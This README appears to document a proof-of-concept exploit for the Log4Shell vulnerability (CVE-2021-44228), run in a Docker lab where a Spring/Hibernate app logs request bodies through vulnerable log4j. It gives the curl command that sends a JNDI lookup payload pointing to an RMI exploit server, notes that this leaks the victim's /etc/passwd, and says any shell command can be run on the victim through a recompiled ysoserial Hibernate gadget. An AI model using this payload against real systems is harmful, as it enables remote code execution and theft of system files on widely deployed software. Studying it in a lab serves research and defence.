# CVE-2021-44228 POC - Spring / Hibernate

_This POC uses Spring / Hibernate, however a similar approach of rmi -> deserialization could be used to trigger any deserialization vulnerability_


$ docker-compose up
$ curl -X POST -H 'Content-Type: text/plain' localhost:8080 --data-binary '${jndi:rmi://exploit:10000/a}'

You should see the contents of the victim's /etc/passwd appear in the logs of the `attacker` container.
You can replace the command in the `exploit` service to run any shell command on the victim.

## Victim

The victim is running a standard [starter spring app](!type=gradle-project&language=java&platformVersion=2.6.1&packaging=jar&jvmVersion=11&groupId=dev.uint0.pocs&artifactId=cve202144228&name=cve202144228&description=CVE-2021-44228%20POC%20-%20Spring%20%2F%20Hibernate&packageName=dev.uint0.pocs.cve202144228&dependencies=data-jpa,web,h2) with the "Spring Data JPA" (for Hibernate), "Spring Web", and "H2" (as a data store) dependencies. Only 2 modifications have been made on top of this

1. Removed tests
2. Replaced the `slf4j` logger with the vulnerable `log4j`

All dependencies are up to date. There are no magic flags enabled.

The victim exposes a `POST`-able endpoint on `/` which will log the request.

## Exploit

The exploit relies on a fork of [ysoserial]( using the `Hibernate` exploit generator. In order to have the exploit to work with the latest version of hibernate we will need to recompile ysoserial.